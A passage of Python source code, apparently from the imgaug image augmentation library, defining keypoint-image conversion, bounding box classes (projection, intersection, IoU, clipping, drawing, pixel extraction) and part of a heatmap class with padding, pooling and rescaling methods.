"""
Converts an image generated by `to_keypoint_image()` back to
an KeypointsOnImage object.
Parameters
----------
image : (H,W,N) ndarray
The keypoints image. N is the number of
keypoints.
if_not_found_coords : tuple or list or dict or None
Coordinates to use for keypoints that cannot be found in `image`.
If this is a list/tuple, it must have two integer values. If it
is a dictionary, it must have the keys "x" and "y". If this
is None, then the keypoint will not be added to the final
KeypointsOnImage object.
threshold : int
The search for keypoints works by searching for the argmax in
each channel. This parameters contains the minimum value that
the max must have in order to be viewed as a keypoint.
nb_channels : None or int
Number of channels of the image on which the keypoints are placed.
Some keypoint augmenters require that information.
If set to None, the keypoint's shape will be set
to `(height, width)`, otherwise `(height, width, nb_channels)`.
Returns
-------
out : KeypointsOnImage
The extracted keypoints.
"""
do_assert(len(image.shape) == 3)
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
do_assert(len(if_not_found_coords) == 2)
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
out_shape = (height, width)
if nb_channels is not None:
out_shape += (nb_channels,)
return KeypointsOnImage(keypoints, shape=out_shape)
def copy(self):
"""
Create a shallow copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
"""
Class representing bounding boxes.
Each bounding box is parameterized by its top left and bottom right corners. Both are given
as x and y-coordinates.
Parameters
----------
x1 : number
X-coordinate of the top left of the bounding box.
y1 : number
Y-coordinate of the top left of the bounding box.
x2 : number
X-coordinate of the bottom right of the bounding box.
y2 : number
Y-coordinate of the bottom right of the bounding box.
"""
def __init__(self, x1, y1, x2, y2, label=None):
"""Create a new BoundingBox instance."""
if x1 > x2:
x2, x1 = x1, x2
do_assert(x2 > x1)
if y1 > y2:
y2, y1 = y1, y2
do_assert(y2 > y1)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.label = label
@property
def x1_int(self):
"""
Return the x-coordinate of the top left corner as an integer.
Returns
-------
result : int
X-coordinate of the top left corner, rounded to the closest integer.
"""
return int(round(self.x1))
@property
def y1_int(self):
"""
Return the y-coordinate of the top left corner as an integer.
Returns
-------
result : int
Y-coordinate of the top left corner, rounded to the closest integer.
"""
return int(round(self.y1))
@property
def x2_int(self):
"""
Return the x-coordinate of the bottom left corner as an integer.
Returns
-------
result : int
X-coordinate of the bottom left corner, rounded to the closest integer.
"""
return int(round(self.x2))
@property
def y2_int(self):
"""
Return the y-coordinate of the bottom left corner as an integer.
Returns
-------
result : int
Y-coordinate of the bottom left corner, rounded to the closest integer.
"""
return int(round(self.y2))
@property
def height(self):
"""
Estimate the height of the bounding box.
Returns
-------
result : number
Height of the bounding box.
"""
return self.y2 - self.y1
@property
def width(self):
"""
Estimate the width of the bounding box.
Returns
-------
result : number
Width of the bounding box.
"""
return self.x2 - self.x1
@property
def center_x(self):
"""
Estimate the x-coordinate of the center point of the bounding box.
Returns
-------
result : number
X-coordinate of the center point of the bounding box.
"""
return self.x1 + self.width/2
@property
def center_y(self):
"""
Estimate the y-coordinate of the center point of the bounding box.
Returns
-------
result : number
Y-coordinate of the center point of the bounding box.
"""
return self.y1 + self.height/2
@property
def area(self):
"""
Estimate the area of the bounding box.
Returns
-------
result : number
Area of the bounding box, i.e. `height * width`.
"""
return self.height * self.width
def project(self, from_shape, to_shape):
"""
Project the bounding box onto a new position on a new image.
E.g. if the bounding box is on its original image at
x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
a new image with size (width=200, height=200), its new position will
be (x1=20, y1=40). (Analogous for x2/y2.)
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : BoundingBox
BoundingBox object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return self.copy()
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
do_assert(from_height > 0)
do_assert(from_width > 0)
do_assert(to_height > 0)
do_assert(to_width > 0)
x1 = (self.x1 / from_width) * to_width
y1 = (self.y1 / from_height) * to_height
x2 = (self.x2 / from_width) * to_width
y2 = (self.y2 / from_height) * to_height
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2,
label=self.label
)
def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
"""
Extend the size of the bounding box along its sides.
Parameters
----------
all_sides : number, optional(default=0)
Value by which to extend the bounding box size along all sides.
top : number, optional(default=0)
Value by which to extend the bounding box size along its top side.
right : number, optional(default=0)
Value by which to extend the bounding box size along its right side.
bottom : number, optional(default=0)
Value by which to extend the bounding box size along its bottom side.
left : number, optional(default=0)
Value by which to extend the bounding box size along its left side.
Returns
-------
result : BoundingBox
Extended bounding box.
"""
return BoundingBox(
x1=self.x1 - all_sides - left,
x2=self.x2 + all_sides + right,
y1=self.y1 - all_sides - top,
y2=self.y2 + all_sides + bottom
)
def intersection(self, other, default=None):
"""
Compute the intersection bounding box of this bounding box and another one.
Parameters
----------
other : BoundingBox
Other bounding box with which to generate the intersection.
Returns
-------
result : BoundingBox
Intersection bounding box of the two bounding boxes.
"""
x1_i = max(self.x1, other.x1)
y1_i = max(self.y1, other.y1)
x2_i = min(self.x2, other.x2)
y2_i = min(self.y2, other.y2)
if x1_i >= x2_i or y1_i >= y2_i:
return default
else:
return BoundingBox(x1=x1_i, y1=y1_i, x2=x2_i, y2=y2_i)
def union(self, other):
"""
Compute the union bounding box of this bounding box and another one.
This is equivalent to drawing a bounding box around all corners points of both
bounding boxes.
Parameters
----------
other : BoundingBox
Other bounding box with which to generate the union.
Returns
-------
result : BoundingBox
Union bounding box of the two bounding boxes.
"""
return BoundingBox(
x1=min(self.x1, other.x1),
y1=min(self.y1, other.y1),
x2=max(self.x2, other.x2),
y2=max(self.y2, other.y2),
)
def iou(self, other):
"""
Compute the IoU of this bounding box with another one.
IoU is the intersection over union, defined as:
area(intersection(A, B)) / area(union(A, B))
= area(intersection(A, B)) / (area(A) + area(B) - area(intersection(A, B)))
Parameters
----------
other : BoundingBox
Other bounding box with which to compare.
Returns
-------
result : float
IoU between the two bounding boxes.
"""
inters = self.intersection(other)
if inters is None:
return 0
else:
return inters.area / (self.area + other.area - inters.area)
def is_fully_within_image(self, image):
"""
Estimate whether the bounding box is fully inside the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape.
Returns
-------
result : bool
True if the bounding box is fully inside the image area.
False otherwise.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
return self.x1 >= 0 and self.x2 <= width and self.y1 >= 0 and self.y2 <= height
def is_partly_within_image(self, image):
"""
Estimate whether the bounding box is at least partially inside the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape.
Returns
-------
result : bool
True if the bounding box is at least partially inside the image area.
False otherwise.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
img_bb = BoundingBox(x1=0, x2=width, y1=0, y2=height)
return self.intersection(img_bb) is not None
def is_out_of_image(self, image, fully=True, partly=False):
"""
Estimate whether the bounding box is partially or fully outside of the image area.
Parameters
----------
image : (H,W,...) ndarray or tuple of ints
Image dimensions to use. If an ndarray, its shape will be used. If a tuple, it is
assumed to represent the image shape and must contain at least two integers.
fully : bool, optional(default=True)
Whether to return True if the bounding box is fully outside fo the image area.
partly : bool, optional(default=False)
Whether to return True if the bounding box is at least partially outside fo the
image area.
Returns
-------
result : bool
True if the bounding box is partially/fully outside of the image area, depending
on defined parameters. False otherwise.
"""
if self.is_fully_within_image(image):
return False
elif self.is_partly_within_image(image):
return partly
else:
return fully
def cut_out_of_image(self, image):
"""
Cut off all parts of the bounding box that are outside of the image.
Parameters
----------
image : (H,W,...) ndarray or tuple of at least two ints
Image dimensions to use for the clipping of the bounding box. If an ndarray, its
shape will be used. If a tuple, it is assumed to represent the image shape.
Returns
-------
result : BoundingBox
Bounding box, clipped to fall within the image dimensions.
"""
if isinstance(image, tuple):
shape = image
else:
shape = image.shape
height, width = shape[0:2]
do_assert(height > 0)
do_assert(width > 0)
x1 = np.clip(self.x1, 0, width)
x2 = np.clip(self.x2, 0, width)
y1 = np.clip(self.y1, 0, height)
y2 = np.clip(self.y2, 0, height)
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2,
label=self.label
)
def shift(self, top=None, right=None, bottom=None, left=None):
"""
Shift the bounding box from one or more image sides, i.e. move it on the x/y-axis.
Parameters
----------
top : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the top.
right : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the right.
bottom : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the bottom.
left : None or int, optional(default=None)
Amount of pixels by which to shift the bounding box from the left.
Returns
-------
result : BoundingBox
Shifted bounding box.
"""
top = top if top is not None else 0
right = right if right is not None else 0
bottom = bottom if bottom is not None else 0
left = left if left is not None else 0
return self.copy(
x1=self.x1+left-right,
x2=self.x2+left-right,
y1=self.y1+top-bottom,
y2=self.y2+top-bottom
)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw the bounding box on an image.
Parameters
----------
image : (H,W,C) ndarray(uint8)
The image onto which to draw the bounding box.
color : iterable of int, optional(default=[0,255,0])
The color to use, corresponding to the channel layout of the image. Usually RGB.
alpha : float, optional(default=1.0)
The transparency of the drawn bounding box, where 1.0 denotes no transparency and
0.0 is invisible.
thickness : int, optional(default=1)
The thickness of the bounding box in pixels. If the value is larger than 1, then
additional pixels will be added around the bounding box (i.e. extension towards the
outside).
copy : bool, optional(default=True)
Whether to copy the input image or change it in-place.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an error if the bounding box is partially/fully outside of the
image. If set to False, no error will be raised and only the parts inside the image
will be drawn.
Returns
-------
result : (H,W,C) ndarray(uint8)
Image with bounding box drawn on it.
"""
if raise_if_out_of_image and self.is_out_of_image(image):
raise Exception("Cannot draw bounding box x1=%.8f, y1=%.8f, x2=%.8f, y2=%.8f on image with shape %s." % (self.x1, self.y1, self.x2, self.y2, image.shape))
result = np.copy(image) if copy else image
if isinstance(color, (tuple, list)):
color = np.uint8(color)
for i in range(thickness):
y = [self.y1_int-i, self.y1_int-i, self.y2_int+i, self.y2_int+i]
x = [self.x1_int-i, self.x2_int+i, self.x2_int+i, self.x1_int-i]
rr, cc = skimage.draw.polygon_perimeter(y, x, shape=result.shape)
if alpha >= 0.99:
result[rr, cc, :] = color
else:
if is_float_array(result):
result[rr, cc, :] = (1 - alpha) * result[rr, cc, :] + alpha * color
result = np.clip(result, 0, 255)
else:
input_dtype = result.dtype
result = result.astype(np.float32)
result[rr, cc, :] = (1 - alpha) * result[rr, cc, :] + alpha * color
result = np.clip(result, 0, 255).astype(input_dtype)
return result
def extract_from_image(self, image):
"""
Extract the image pixels within the bounding box.
This function will zero-pad the image if the bounding box is partially/fully outside of
the image.
Parameters
----------
image : (H,W) or (H,W,C) ndarray
The image from which to extract the pixels within the bounding box.
Returns
-------
result : (H',W') or (H',W',C) ndarray
Pixels within the bounding box. Zero-padded if the bounding box is partially/fully
outside of the image.
"""
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
height, width = image.shape[0], image.shape[1]
x1, x2, y1, y2 = self.x1_int, self.x2_int, self.y1_int, self.y2_int
# if the bb is outside of the image area, the following pads the image
# first with black pixels until the bb is inside the image
# and only then extracts the image area
# TODO probably more efficient to initialize an array of zeros
# and copy only the portions of the bb into that array that are
# natively inside the image area
if x1 < 0:
pad_left = abs(x1)
x2 = x2 + abs(x1)
x1 = 0
if y1 < 0:
pad_top = abs(y1)
y2 = y2 + abs(y1)
y1 = 0
if x2 >= width:
pad_right = x2 - (width - 1)
if y2 >= height:
pad_bottom = y2 - (height - 1)
if any([val > 0 for val in [pad_top, pad_right, pad_bottom, pad_left]]):
if len(image.shape) == 2:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right)), mode="constant")
else:
image = np.pad(image, ((pad_top, pad_bottom), (pad_left, pad_right), (0, 0)), mode="constant")
return image[y1:y2, x1:x2]
# TODO also add to_heatmap
# TODO add this to BoundingBoxesOnImage
def to_keypoints(self):
"""
Convert the corners of the bounding box to keypoints (clockwise, starting at top left).
Returns
-------
result : list of Keypoint
Corners of the bounding box as keypoints.
"""
return [
Keypoint(x=self.x1, y=self.y1),
Keypoint(x=self.x2, y=self.y1),
Keypoint(x=self.x2, y=self.y2),
Keypoint(x=self.x1, y=self.y2)
]
def copy(self, x1=None, y1=None, x2=None, y2=None, label=None):
"""
Create a shallow copy of the BoundingBox object.
Parameters
----------
x1 : None or number
If not None, then the x1 coordinate of the copied object will be set to this value.
y1 : None or number
If not None, then the y1 coordinate of the copied object will be set to this value.
x2 : None or number
If not None, then the x2 coordinate of the copied object will be set to this value.
y2 : None or number
If not None, then the y2 coordinate of the copied object will be set to this value.
label : None or string
If not None, then the label of the copied object will be set to this value.
Returns
-------
result : BoundingBox
Shallow copy.
"""
return BoundingBox(
x1=self.x1 if x1 is None else x1,
x2=self.x2 if x2 is None else x2,
y1=self.y1 if y1 is None else y1,
y2=self.y2 if y2 is None else y2,
label=self.label if label is None else label
)
def deepcopy(self, x1=None, y1=None, x2=None, y2=None, label=None):
"""
Create a deep copy of the BoundingBoxesOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
return self.copy(x1=x1, y1=y1, x2=x2, y2=y2, label=label)
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBox(x1=%.4f, y1=%.4f, x2=%.4f, y2=%.4f, label=%s)" % (self.x1, self.y1, self.x2, self.y2, self.label)
class BoundingBoxesOnImage(object):
"""
Object that represents all bounding boxes on a single image.
Parameters
----------
bounding_boxes : list of BoundingBox
List of bounding boxes on the image.
shape : tuple of int
The shape of the image on which the bounding boxes are placed.
Examples
--------
>>> bbs = [
>>> BoundingBox(x1=10, y1=20, x2=20, y2=30),
>>> BoundingBox(x1=25, y1=50, x2=30, y2=70)
>>> ]
>>> bbs_oi = BoundingBoxesOnImage(bbs, shape=image.shape)
"""
def __init__(self, bounding_boxes, shape):
self.bounding_boxes = bounding_boxes
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
"""
Get the height of the image on which the bounding boxes fall.
Returns
-------
result : int
Image height.
"""
return self.shape[0]
@property
def width(self):
"""
Get the width of the image on which the bounding boxes fall.
Returns
-------
result : int
Image width.
"""
return self.shape[1]
@property
def empty(self):
"""
Returns whether this object contains zero bounding boxes.
Returns
-------
result : bool
True if this object contains zero bounding boxes.
"""
return len(self.bounding_boxes) == 0
def on(self, image):
"""
Project bounding boxes from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the bounding boxes are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : BoundingBoxesOnImage
Object containing all projected bounding boxes.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
bounding_boxes = [bb.project(self.shape, shape) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bounding_boxes, shape)
def draw_on_image(self, image, color=[0, 255, 0], alpha=1.0, thickness=1, copy=True, raise_if_out_of_image=False):
"""
Draw all bounding boxes onto a given image.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the bounding boxes.
This image should usually have the same shape as
set in BoundingBoxesOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all bounding boxes. If a single int `C`, then that is
equivalent to (C,C,C).
size : float, optional(default=1.0)
Alpha/transparency of the bounding box.
thickness : int, optional(default=1)
Thickness in pixels.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any bounding box is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn bounding boxes.
"""
for bb in self.bounding_boxes:
image = bb.draw_on_image(
image,
color=color,
alpha=alpha,
thickness=thickness,
copy=copy,
raise_if_out_of_image=raise_if_out_of_image
)
return image
def remove_out_of_image(self, fully=True, partly=False):
"""
Remove all bounding boxes that are fully or partially outside of the image.
Parameters
----------
fully : bool, optional(default=True)
Whether to remove bounding boxes that are fully outside of the image.
partly : bool, optional(default=False)
Whether to remove bounding boxes that are partially outside of the image.
Returns
-------
result : BoundingBoxesOnImage
Reduced set of bounding boxes, with those that were fully/partially outside of
the image removed.
"""
bbs_clean = [bb for bb in self.bounding_boxes if not bb.is_out_of_image(self.shape, fully=fully, partly=partly)]
return BoundingBoxesOnImage(bbs_clean, shape=self.shape)
def cut_out_of_image(self):
"""
Cut off all parts from all bounding boxes that are outside of the image.
Returns
-------
result : BoundingBoxesOnImage
Bounding boxes, clipped to fall within the image dimensions.
"""
bbs_cut = [bb.cut_out_of_image(self.shape) for bb in self.bounding_boxes if bb.is_partly_within_image(self.shape)]
return BoundingBoxesOnImage(bbs_cut, shape=self.shape)
def shift(self, top=None, right=None, bottom=None, left=None):
"""
Shift all bounding boxes from one or more image sides, i.e. move them on the x/y-axis.
Parameters
----------
top : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the top.
right : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the right.
bottom : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the bottom.
left : None or int, optional(default=None)
Amount of pixels by which to shift all bounding boxes from the left.
Returns
-------
result : BoundingBoxesOnImage
Shifted bounding boxes.
"""
bbs_new = [bb.shift(top=top, right=right, bottom=bottom, left=left) for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs_new, shape=self.shape)
def copy(self):
"""
Create a shallow copy of the BoundingBoxesOnImage object.
Returns
-------
out : BoundingBoxesOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the BoundingBoxesOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# Manual copy is far faster than deepcopy for KeypointsOnImage,
# so use manual copy here too
bbs = [bb.deepcopy() for bb in self.bounding_boxes]
return BoundingBoxesOnImage(bbs, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "BoundingBoxesOnImage(%s, shape=%s)" % (str(self.bounding_boxes), self.shape)
class HeatmapsOnImage(object):
"""
Object representing heatmaps on images.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray(float32)
Array representing the heatmap(s). If multiple heatmaps, then C is expected to denote
their number.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
If there is not a corresponding image, use the shape of the heatmaps array.
min_value : float, optional(default=0.0)
Minimum value for the heatmaps that `arr` represents. This will usually
be 0.0.
max_value : float, optional(default=1.0)
Maximum value for the heatmaps that `arr` represents. This will usually
be 1.0.
"""
def __init__(self, arr, shape, min_value=0.0, max_value=1.0):
"""Construct a new HeatmapsOnImage object."""
assert arr.dtype.type in [np.float32]
assert arr.ndim in [2, 3]
assert len(shape) in [2, 3]
assert min_value < max_value
assert np.min(arr.flat[0:50]) >= min_value - np.finfo(arr.dtype).eps
assert np.max(arr.flat[0:50]) <= max_value + np.finfo(arr.dtype).eps
if arr.ndim == 2:
arr = arr[..., np.newaxis]
self.arr_was_2d = True
else:
self.arr_was_2d = False
eps = np.finfo(np.float32).eps
min_is_zero = 0.0 - eps < min_value < 0.0 + eps
max_is_one = 1.0 - eps < max_value < 1.0 + eps
if min_is_zero and max_is_one:
self.arr_0to1 = arr
else:
self.arr_0to1 = (arr - min_value) / (max_value - min_value)
self.shape = shape
self.min_value = min_value
self.max_value = max_value
def get_arr(self):
"""
Get the heatmap array in the desired value range.
The HeatmapsOnImage object saves heatmaps internally in the value range (min=0.0, max=1.0).
This function converts the internal representation to (min=min_value, max=max_value),
where min_value and max_value are provided upon instantiation of the object.
Returns
-------
result : (H,W) or (H,W,C) ndarray(float32)
Heatmap array.
"""
if self.arr_was_2d and self.arr_0to1.shape[2] == 1:
arr = self.arr_0to1[:, :, 0]
else:
arr = self.arr_0to1
eps = np.finfo(np.float32).eps
min_is_zero = 0.0 - eps < self.min_value < 0.0 + eps
max_is_one = 1.0 - eps < self.max_value < 1.0 + eps
if min_is_zero and max_is_one:
return np.copy(arr)
else:
diff = self.max_value - self.min_value
return self.min_value + diff * arr
# TODO
#def find_global_maxima(self):
# raise NotImplementedError()
def draw(self, size=None, cmap="jet"):
"""
Render the heatmaps as RGB images.
Parameters
----------
size : None or float or iterable of two ints or iterable of two floats, optional(default=None)
Size of the rendered RGB image as (height, width).
See `imresize_single_image()` for details.
If set to None, no resizing is performed and the size of the heatmaps array is used.
cmap : string or None, optional(default="jet")
Color map of matplotlib to use in order to convert the heatmaps into RGB images.
If set to None, no color map will be used and the heatmaps will be converted
as simple intensity maps.
Returns
-------
heatmaps_drawn : list of (H,W,3) ndarray(uint8)
Rendered heatmaps, one per heatmap array channel.
"""
heatmaps_uint8 = self.to_uint8()
heatmaps_drawn = []
for c in sm.xrange(heatmaps_uint8.shape[2]):
# c:c+1 here, because the additional axis is needed by imresize_single_image
heatmap_c = heatmaps_uint8[..., c:c+1]
if size is not None:
heatmap_c_rs = imresize_single_image(heatmap_c, size,
interpolation="nearest")
else:
heatmap_c_rs = heatmap_c
heatmap_c_rs = np.squeeze(heatmap_c_rs).astype(np.float32) / 255.0
if cmap is not None:
import matplotlib.pyplot as plt
cmap_func = plt.get_cmap(cmap)
heatmap_cmapped = cmap_func(heatmap_c_rs)
heatmap_cmapped = np.delete(heatmap_cmapped, 3, 2)
else:
heatmap_cmapped = np.tile(heatmap_c_rs[..., np.newaxis], (1, 1, 3))
heatmap_cmapped = np.clip(heatmap_cmapped * 255, 0, 255).astype(np.uint8)
heatmaps_drawn.append(heatmap_cmapped)
return heatmaps_drawn
def draw_on_image(self, image, alpha=0.75, cmap="jet", resize="heatmaps"):
"""
Draw the heatmaps as overlays over an image.
Parameters
----------
image : (H,W,3) ndarray(uint8)
Image onto which to draw the heatmaps.
alpha : float, optional(default=0.75)
Alpha/opacity value to use for the mixing of image and heatmaps.
Higher values mean that the heatmaps will be more visible and the image less visible.
cmap : string or None, optional(default="jet")
Color map to use. See `HeatmapsOnImage.draw()` for details.
resize : "heatmaps" or "image", optional(default="heatmaps")
In case of size differences between the image and heatmaps, either the image or
the heatmaps can be resized. This parameter controls which of the two will be resized
to the other's size.
Returns
-------
mix : list of (H,W,3) ndarray(uint8)
Rendered overlays, one per heatmap array channel.
"""
# assert RGB image
assert image.ndim == 3
assert image.shape[2] == 3
assert image.dtype.type == np.uint8
assert 0 - 1e-8 <= alpha <= 1.0 + 1e-8
assert resize in ["heatmaps", "image"]
if resize == "image":
image = imresize_single_image(image, self.arr_0to1.shape[0:2], interpolation="cubic")
heatmaps_drawn = self.draw(
size=image.shape[0:2] if resize == "heatmaps" else None,
cmap=cmap
)
mix = [
np.clip((1-alpha) * image + alpha * heatmap_i, 0, 255).astype(np.uint8)
for heatmap_i
in heatmaps_drawn
]
return mix
def pad(self, top=0, right=0, bottom=0, left=0, mode="constant", cval=0.0):
"""
Pad the heatmaps on their top/right/bottom/left side.
Parameters
----------
top : int, optional(default=0)
Amount of pixels to add at the top side of the heatmaps. Must be 0 or greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the heatmaps. Must be 0 or greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the heatmaps. Must be 0 or greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the heatmaps. Must be 0 or greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
result : HeatmapsOnImage
Padded heatmaps of height H'=H+top+bottom and width W'=W+left+right.
"""
arr_0to1_padded = pad(self.arr_0to1, top=top, right=right, bottom=bottom, left=left, mode=mode, cval=cval)
return HeatmapsOnImage.from_0to1(arr_0to1_padded, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def pad_to_aspect_ratio(self, aspect_ratio, mode="constant", cval=0.0, return_pad_amounts=False):
"""
Pad the heatmaps on their sides so that they match a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0.0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
First tuple entry: Padded heatmaps as HeatmapsOnImage object.
Second tuple entry: Amounts by which the heatmaps were padded on each side, given
as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the heatmaps object is returned.
"""
arr_0to1_padded, pad_amounts = pad_to_aspect_ratio(self.arr_0to1, aspect_ratio=aspect_ratio, mode=mode, cval=cval, return_pad_amounts=True)
heatmaps = HeatmapsOnImage.from_0to1(arr_0to1_padded, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
if return_pad_amounts:
return heatmaps, pad_amounts
else:
return heatmaps
def avg_pool(self, block_size):
"""
Rescale the heatmap(s) array using average pooling of a given block/kernel size.
Parameters
----------
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool, aka kernel size. See `imgaug.pool()` for details.
Returns
-------
result : HeatmapsOnImage
Heatmaps after average pooling.
"""
arr_0to1_reduced = avg_pool(self.arr_0to1, block_size, cval=0.0)
return HeatmapsOnImage.from_0to1(arr_0to1_reduced, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def max_pool(self, block_size):
"""
Rescale the heatmap(s) array using max-pooling of a given block/kernel size.
Parameters
----------
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool, aka kernel size. See `imgaug.pool()` for details.
Returns
-------
result : HeatmapsOnImage
Heatmaps after max-pooling.
"""
arr_0to1_reduced = max_pool(self.arr_0to1, block_size)
return HeatmapsOnImage.from_0to1(arr_0to1_reduced, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def scale(self, sizes, interpolation="cubic"):
"""
Rescale the heatmap(s) array to the provided size given the provided interpolation.
Parameters
----------
sizes : float or iterable of two ints or iterable of two floats
New size of the array in (height, width). See `imresize_single_image()` for details.
interpolation : None or string or int, optional(default="cubic")
The interpolation to use during resize. See `imresize_single_image()` for details.
Returns
-------
result : HeatmapsOnImage
Rescaled heatmaps object.
"""
arr_0to1_rescaled = imresize_single_image(self.arr_0to1, sizes, interpolation=interpolation)
# cubic interpolation can lead to values outside of [0.0, 1.0],
# see https://github.com/opencv/opencv/issues/7195
# TODO area interpolation too?
arr_0to1_rescaled = np.clip(arr_0to1_rescaled, 0.0, 1.0)
return HeatmapsOnImage.from_0to1(arr_0to1_rescaled, shape=self.shape, min_value=self.min_value, max_value=self.max_value)
def to_uint8(self):
"""
Convert this heatmaps object to a 0-to-255 array.
Returns
-------
arr_uint8 : (H,W,C) ndarray(uint8)
Heatmap as a 0-to-255 array.
"""
# TODO this always returns (H,W,C), even if input ndarray was originall (H,W)
# does it make sense here to also return (H,W) if self.arr_was_2d?
arr_0to255 = np.clip(np.round(self.arr_0to1 * 255), 0, 255)
arr_uint8 = arr_0to255.astype(np.uint8)
return arr_uint8
@staticmethod
def from_uint8(arr_uint8, shape, min_value=0.0, max_value=1.0):
"""
Create a heatmaps object from an heatmap array containing values ranging from 0 to 255.
Parameters
----------
arr_uint8 : (H,W) or (H,W,C) ndarray(uint8)
Heatmap(s) array, where H=height, W=width, C=heatmap channels.
shape : tuple of ints
Shape of the image on which the heatmap(s) is/are placed. NOT the shape of the
heatmap(s) array, unless it is identical to the image shape (note the likely
difference between the arrays in the number of channels).
